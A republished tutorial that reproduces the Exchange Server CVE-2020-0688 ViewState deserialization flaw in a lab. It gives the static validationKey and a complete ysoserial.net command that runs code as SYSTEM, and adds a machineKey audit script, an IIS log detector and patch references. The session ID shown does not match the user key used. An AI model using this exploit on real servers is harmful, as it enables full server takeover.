2025-01-18 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains in detail how to reproduce the remote code execution vulnerability (CVE-2020-0688) in Microsoft Exchange Server. The editor shares it as a reference; after reading it you should have a working understanding of the relevant concepts.
Environment setup
Install Exchange Server 2013 on Windows Server 2008.
First, give the Server 2008 virtual machine a static IP address.
In Server Manager, select Add Roles and check Active Directory Domain Services.
After the role installs, run dcpromo from Start > Run.
Click Next twice, then choose to create a new domain in a new forest.
Enter the domain name in FQDN format.
Select the Windows Server 2008 functional level and check the DNS server option.
Set the password.
Complete the installation.
Preparatory steps
Open Active Directory Users and Computers and add a domain user.
After creating the user, join the computer to the new domain, entering the user you just added when prompted, and then restart the computer.
After logging in with that user, install the remaining prerequisites.
Start PowerShell as administrator:
Import-Module ServerManager
Add-WindowsFeature RSAT-ADDS
Restart the computer after installation and open PowerShell with administrator privileges again:
Import-Module ServerManager
Add-WindowsFeature NET-Framework, ADLDS
Install .NET Framework 4.5.
Install the Microsoft Office 2010 Filter Pack (64-bit):
https://www.microsoft.com/en-us/download/confirmation.aspx?id=17062
Open the Exchange installer and select the extraction location.
Start installing Exchange.
The installer raises a number of problems during setup; resolve them one at a time.
Start the actual installation.
Installation completed.
CVE-2020-0688 vulnerability reproduction
Vulnerability details
The vulnerability lies in the Exchange Control Panel (ECP) component, and its nature is very simple. Instead of generating a unique key for every installation, all Microsoft Exchange Server installations ship with the same validationKey and decryptionKey in the installed web.config file. These keys protect the ViewState. ViewState is server-side state that an ASP.NET web application stores on the client in serialized form; the client returns it to the server in the __VIEWSTATE request parameter.
Because the keys are static, an authenticated attacker can trick the target server into deserializing maliciously crafted ViewState data. With the help of YSoSerial.net, the attacker can execute arbitrary .NET code in the context of the Exchange Control Panel web application.
To exploit this vulnerability, the ViewStateUserKey and __VIEWSTATEGENERATOR values must be collected from an authenticated session. The ViewStateUserKey can be obtained from the ASP.NET_SessionId cookie, while the __VIEWSTATEGENERATOR can be found in a hidden form field. Both are easy to find with the browser's developer tools.
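Because the root cause is the shared machineKey, the first thing a defender wants is a check that tells whether a given web.config still carries it. The following audit script is an added example for this article, not code from the original write-up or from Microsoft. It assumes the usual ASP.NET layout (configuration > system.web > machineKey) and compares the validationKey against the static value quoted on this page; the three sample configurations are constructed for the demonstration.

```python
"""Audit an ASP.NET web.config for the static Exchange machineKey (added example)."""
import xml.etree.ElementTree as ET

# Static validationKey shared by every unpatched Exchange install (value quoted in the article).
KNOWN_STATIC_VALIDATION_KEY = "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"

# MAC algorithms that ASP.NET still accepts but that are weak for ViewState protection.
WEAK_VALIDATION_ALGORITHMS = {"SHA1", "MD5"}

# Constructed sample: the unpatched state, with the same key on every server.
SAMPLE_VULNERABLE_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
                decryptionKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>"""

# Constructed sample: a per-server random key with a stronger MAC (hex value is made up).
SAMPLE_PATCHED_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="A1B2C3D4E5F60718293A4B5C6D7E8F90A1B2C3D4E5F60718293A4B5C6D7E8F90"
                decryptionKey="FEDCBA9876543210FEDCBA9876543210FEDCBA9876543210FEDCBA9876543210"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""

# Constructed sample: no machineKey element at all.
SAMPLE_NO_KEY_CONFIG = """<configuration>
  <system.web>
    <compilation debug="false" />
  </system.web>
</configuration>"""


def audit_machine_key(config_xml: str) -> dict:
    """Return {"status": "vulnerable" | "weak" | "ok" | "missing", "findings": [...]}."""
    root = ET.fromstring(config_xml)
    machine_key = root.find("./system.web/machineKey")
    if machine_key is None:
        return {"status": "missing",
                "findings": ["no <machineKey> element: ASP.NET falls back to auto-generated keys"]}

    findings = []
    status = "ok"
    # Attribute defaults follow ASP.NET 4.5 (assumption): AutoGenerate key, HMACSHA256 MAC.
    validation_key = machine_key.get("validationKey", "AutoGenerate").strip()
    algorithm = machine_key.get("validation", "HMACSHA256").strip().upper()

    if validation_key.upper() == KNOWN_STATIC_VALIDATION_KEY:
        status = "vulnerable"
        findings.append("validationKey is the static key shared by all unpatched Exchange installs (CVE-2020-0688)")
    elif validation_key.upper().startswith("AUTOGENERATE"):
        findings.append("validationKey is auto-generated per machine")
    else:
        findings.append("validationKey is a custom static key (acceptable if unique to this deployment)")

    if algorithm in WEAK_VALIDATION_ALGORITHMS:
        if status == "ok":
            status = "weak"
        findings.append(f"validation algorithm {algorithm} is weak; prefer HMACSHA256 or stronger")

    return {"status": status, "findings": findings}


def audit_file(path: str) -> dict:
    """Audit a web.config on disk, e.g. the one under the ECP virtual directory."""
    with open(path, encoding="utf-8-sig") as handle:  # utf-8-sig strips a BOM if present
        return audit_machine_key(handle.read())


if __name__ == "__main__":
    for name, sample in (("vulnerable", SAMPLE_VULNERABLE_CONFIG),
                         ("patched", SAMPLE_PATCHED_CONFIG),
                         ("no key", SAMPLE_NO_KEY_CONFIG)):
        result = audit_machine_key(sample)
        print(f"{name:10s} -> {result['status']}: {'; '.join(result['findings'])}")
```

Run it against the ECP web.config on each Exchange server via audit_file; a "vulnerable" result means the update has not replaced the shared key, and a "weak" result flags SHA1/MD5 ViewState MACs even when the key itself is unique.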
First, go to the 192.168.92.128/ecp page and log in. The account used does not require any special privileges.
Next, open the Network tab of the browser's developer tools and press F5 to resend the request. In the page source you can find __VIEWSTATEGENERATOR, whose value is B97B4E27.
Then open the Headers tab and locate ASP.NET_SessionId=40c8e078-dc79-4001-9a52-de175b38a028.
Now you have all the information needed for the attack:
- validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
- validationalg = SHA1
- generator = B97B4E27
- viewstateuserkey = c1187666-c0ae-4f61-95d4-d2f5348d4300
The next step is to use ysoserial.net to generate the ViewState payload. Remote code execution is demonstrated by creating the file C:\TideSec.txt:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c echo test > C:\TideSec.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="c1187666-c0ae-4f61-95d4-d2f5348d4300" --isdebug --islegacy
URL-encode the output and construct the following URL:
https://192.168.92.128/ecp/default.aspx?__VIEWSTATEGENERATOR=&__VIEWSTATE=
Requesting this URL in the browser returns a 500 error, but the file has in fact been created, and it can be seen that it was created by a process running with SYSTEM privileges. This shows that an attacker can execute code remotely as SYSTEM, fully compromising the Exchange server.
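The request pattern just described is also the detection opportunity: a normal ECP page posts its ViewState in the request body, whereas this exploit path sends __VIEWSTATEGENERATOR and __VIEWSTATE in the query string of a GET to /ecp/default.aspx, and the server answers with HTTP 500. The following detector is an added example for this article, not code from the original write-up; it parses IIS W3C extended logs using the #Fields directive and flags that pattern. The log lines are constructed for the demonstration (field layout, IPs, user name and the ViewState blob are all made up, except the generator value B97B4E27 and server address from the article).

```python
"""Flag CVE-2020-0688 exploitation attempts in IIS W3C logs (added example)."""
from collections import Counter

# Constructed sample in IIS W3C extended format (IIS writes spaces inside fields as '+').
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 8.5
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2020-05-31 10:00:01 192.168.92.128 GET /ecp/default.aspx - 443 CONTOSO\\alice 192.168.92.10 Mozilla/5.0+(Windows+NT+10.0) 200 0 0 120
2020-05-31 10:00:05 192.168.92.128 POST /ecp/default.aspx - 443 CONTOSO\\alice 192.168.92.10 Mozilla/5.0+(Windows+NT+10.0) 200 0 0 95
2020-05-31 10:02:17 192.168.92.128 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyAAAAQUJDREVG 443 CONTOSO\\alice 192.168.92.10 Mozilla/5.0+(Windows+NT+10.0) 500 0 0 310
2020-05-31 10:03:00 192.168.92.128 GET /owa/auth/logon.aspx - 443 - 192.168.92.10 Mozilla/5.0+(Windows+NT+10.0) 200 0 0 10
"""


def parse_w3c_log(text: str):
    """Yield one dict per request line, keyed by the most recent #Fields directive."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#"):  # other directives (#Software, #Version, #Date)
            continue
        if fields is None:
            raise ValueError("log line seen before a #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than misalign the columns
        yield dict(zip(fields, values))


def is_ecp_viewstate_in_query(record: dict) -> bool:
    """True when ViewState travels in the query string of an ECP request."""
    stem = record.get("cs-uri-stem", "").lower()
    query = record.get("cs-uri-query", "").upper()
    return (stem.startswith("/ecp/")
            and "__VIEWSTATE=" in query
            and "__VIEWSTATEGENERATOR=" in query)


def detect_cve_2020_0688(text: str) -> list:
    """Return one alert dict per suspicious request found in the log text."""
    alerts = []
    for record in parse_w3c_log(text):
        if not is_ecp_viewstate_in_query(record):
            continue
        status = record.get("sc-status", "")
        note = "ViewState passed in query string to ECP"
        if status == "500":
            note += "; HTTP 500 response matches the behaviour described in the article"
        alerts.append({
            "time": f"{record['date']} {record['time']}",
            "c-ip": record.get("c-ip", ""),
            "user": record.get("cs-username", ""),
            "uri": record.get("cs-uri-stem", ""),
            "sc-status": status,
            "note": note,
        })
    return alerts


def sources_by_count(alerts: list) -> Counter:
    """Count alerts per client IP so repeated attempts stand out."""
    return Counter(alert["c-ip"] for alert in alerts)


if __name__ == "__main__":
    found = detect_cve_2020_0688(SAMPLE_IIS_LOG)
    for alert in found:
        print(f"{alert['time']} {alert['c-ip']} {alert['user']} {alert['uri']} "
              f"status={alert['sc-status']} :: {alert['note']}")
    print("attempts per source:", dict(sources_by_count(found)))
```

Point detect_cve_2020_0688 at the ECP site's IIS logs (the default location is under inetpub\logs\LogFiles, per site). Because the exploit requires a valid account, the cs-username in each alert is the credential that should be investigated alongside the source IP.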
Scope of impact and hardening
Affected versions
All versions of Exchange Server are affected:
Microsoft Exchange Server 2010 Service Pack 3
Microsoft Exchange Server 2013
Microsoft Exchange Server 2016
Microsoft Exchange Server 2019
Protective measures
Patch download
Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 KB4536989
Microsoft Exchange Server 2013 Cumulative Update 23 KB4536988
Microsoft Exchange Server 2016 Cumulative Update 14 KB4536987
Microsoft Exchange Server 2016 Cumulative Update 15 KB4536987
Microsoft Exchange Server 2019 Cumulative Update 3 KB4536987
Microsoft Exchange Server 2019 Cumulative Update 4 KB4536987
That concludes this walkthrough of reproducing the remote code execution vulnerability in Microsoft Exchange Server. I hope the content above is of some help to you. If you found the article useful, please share it so more people can see it.